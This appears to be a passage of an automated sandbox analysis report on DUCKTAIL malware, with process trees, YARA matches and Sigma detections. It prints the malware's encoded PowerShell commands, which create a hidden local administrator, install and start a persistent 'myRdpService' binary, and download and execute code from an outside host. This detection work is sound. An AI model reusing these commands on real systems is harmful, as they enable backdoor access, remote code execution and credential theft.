HMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 8792 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 4292 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 4968 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 4364 cmdline: "cmd.exe" /c sc stop "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 708 cmdline: sc stop "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 1672 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 7324 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 7608 cmdline: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

sc.exe (PID: 7532 cmdline: sc delete "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 2764 cmdline: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

net.exe (PID: 5480 cmdline: net start "myRdpService" MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 6560 cmdline: C:\Windows\system32\net1 start "myRdpService" MD5: BA0BCCC6029FBBE6D8B41197F252742F)

powershell.exe (PID: 6248 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

myRdpService.exe (PID: 2236 cmdline: C:\Windows\Temp\myRdpService.exe cakoi10 MD5: 5641F3A5B9787F23D3D34F0D9F791B7A)

regedit.exe (PID: 6252 cmdline: "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService" MD5: 999A30979F6195BF562068639FFC4426)

powershell.exe (PID: 6424 cmdline: "powershell.exe" -Command "systeminfo | Select-String \"OS Name\",\"OS Version\";" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

systeminfo.exe (PID: 7436 cmdline: "C:\Windows\system32\systeminfo.exe" MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 8152 cmdline: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 2828 cmdline: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DUCKTAIL	According to Tony Lambert, this is a malware written in .NET. It was observed to be delivered using the .NET Single File deployment feature.	No Attribution	https://forensicitguy.github.io/analyzing-net-core-single-file-ducktail/ https://harfanglab.io/en/insidethelab/reverse-engineering-ida-pro-aot-net/ https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf https://labs.withsecure.com/content/dam/labs/docs/WithSecure_Research_DUCKTAIL.pdf https://securelist.com/ducktail-fashion-week/111017/	https://malpedia.caad.fkie.fraunhofer.de/details/win.ducktail

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000002D.00000002.4760412983.00007FF727B26000.00000004.00000001.01000000.0000000A.sdmp	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0xdac4:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0x11f94:$a2: 0123456789012345678901234567890123456789 0x3291c:$a3: NTPASSWORD 0x2f7b4:$a4: LMPASSWORD 0x5cd04:$a5: aad3b435b51404eeaad3b435b51404ee 0x14f54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
Process Memory Space: powershell.exe PID: 1804	JoeSecurity_Ducktail_12	Yara detected Ducktail	Joe Security
Process Memory Space: powershell.exe PID: 1804	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1eb571:$b1: ::WriteAllBytes( 0x2046b:$b2: ::FromBase64String( 0x2097f:$b2: ::FromBase64String( 0x20ddc:$b2: ::FromBase64String( 0x21051:$b2: ::FromBase64String( 0x21106:$b2: ::FromBase64String( 0x21172:$b2: ::FromBase64String( 0x211d3:$b2: ::FromBase64String( 0x2123d:$b2: ::FromBase64String( 0x21297:$b2: ::FromBase64String( 0x2132f:$b2: ::FromBase64String( 0x21391:$b2: ::FromBase64String( 0x213ff:$b2: ::FromBase64String( 0x21460:$b2: ::FromBase64String( 0x214c9:$b2: ::FromBase64String( 0x21525:$b2: ::FromBase64String( 0x215a3:$b2: ::FromBase64String( 0x2160f:$b2: ::FromBase64String( 0x21678:$b2: ::FromBase64String( 0x216d1:$b2: ::FromBase64String( 0x2173d:$b2: ::FromBase64String(
Process Memory Space: powershell.exe PID: 8952	JoeSecurity_Ducktail_12	Yara detected Ducktail	Joe Security
Process Memory Space: powershell.exe PID: 8952	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2064f7:$b1: ::WriteAllBytes( 0x1f3649:$b2: ::FromBase64String( 0x1f4eaf:$b2: ::FromBase64String( 0x1f6537:$b2: ::FromBase64String( 0x1f65ab:$b2: ::FromBase64String( 0x1f7e11:$b2: ::FromBase64String( 0x1fd396:$b2: ::FromBase64String( 0x1febfc:$b2: ::FromBase64String( 0x1bd4ec:$b3: ::UTF8.GetString( 0x24decd:$s1: -join 0x24f3b4:$s1: -join 0x28dd14:$s1: -join 0x27a95:$s3: reverse 0x27b30:$s3: reverse 0x30602:$s3: reverse 0x1520d2:$s3: Reverse 0x15a07b:$s3: Reverse 0x15a09a:$s3: Reverse 0x15db4f:$s3: Reverse 0x15db94:$s3: Reverse 0x16697f:$s3: Reverse
Process Memory Space: svczHost.exe PID: 6444	JoeSecurity_Ducktail_6	Yara detected Ducktail	Joe Security
Process Memory Space: svczHost.exe PID: 6444	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0x71670:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0x72dcc:$a2: 0123456789012345678901234567890123456789 0x7f790:$a3: NTPASSWORD 0x7e4c7:$a4: LMPASSWORD 0x90fbb:$a5: aad3b435b51404eeaad3b435b51404ee 0x73cc4:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
45.2.myRdpService.exe.7ff727620000.0.unpack	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0x511cc4:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0x516194:$a2: 0123456789012345678901234567890123456789 0x536b1c:$a3: NTPASSWORD 0x5339b4:$a4: LMPASSWORD 0x560f04:$a5: aad3b435b51404eeaad3b435b51404ee 0x519154:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0

Other

Source	Rule	Description	Author	Strings
amsi64_8952.amsi.csv	JoeSecurity_Ducktail_12	Yara detected Ducktail	Joe Security
amsi64_8952.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xc5c3:$b1: ::WriteAllBytes( 0x8a36:$b2: ::FromBase64String( 0xa29d:$b2: ::FromBase64String( 0xb926:$b2: ::FromBase64String( 0x529:$b3: ::UTF8.GetString( 0x8688:$s1: -join 0x239:$s4: += 0x25c:$s4: += 0x1e34:$s4: += 0x1ef6:$s4: += 0x611d:$s4: += 0x823a:$s4: += 0x8524:$s4: += 0x866a:$s4: += 0xbadd:$s4: += 0xbcda:$s4: += 0xdf90:$s4: += 0x5e9a3:$s4: += 0x6344c:$s4: += 0x634cc:$s4: += 0x63592:$s4: +=

Sigma Signatures

System Summary

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQ

Sigma detected: PowerShell Base64 Encoded IEX Cmdlet

Source: Process started

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Source: Process started

Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA0ADQAMgBkADYAZAAyAGIAYgBiAGYAOQA1AGEAMABjADIAZAA5ADgAMwAzADUAYwA3AGMAZgAxADIAZAA5AGQANABhADIAMQA2ADMAYgBmAGQAMwAzAGYANAAyADUANAA3AGQAOABlADIAMQA3ADYAMwA0ADkAZgBjADUAYgBlAGMAOQA5ADkAZABmADcANwBlAGQANgBmAGMAMQAwAGMAZAAyAGIAOABmADEAYgBmADYAZQAxADQAMQA5AGEAZgBkADEAYgA4AGUANgA1ADIAZAA2ADAAOAAyADAAYQA1ADYAZgA1AGQAOAA3ADIAYgA5ADgAMwAyAGQANQA4AGMAZgBlADYANQAzADQAOABiAGQAYgA2ADEANgBkAGIAMgAzAGUANAAzAGYANwA5ADcAMgBkAGEAZgAzADkAMQBmADEAMwBiAGQANgBhADYAOQBjADgAOQAxADkAMAAyADgAMAA3AGEAYQBkADQAMgAzADYAMgA3ADgAMQAxAGMAOABlADAAZAA0AGEAYQA3AGUAZQA5ADMAOQBkADcANAA1ADIAMAAxAGUAZQBkADgAMAA2AGUAZQA5ADcAOQBmAGEAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABiAHkAdABlAEEAcgByAGEAeQA

Sigma detected: PowerShell Base64 Encoded WMI Classes

Source: Process started

Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHI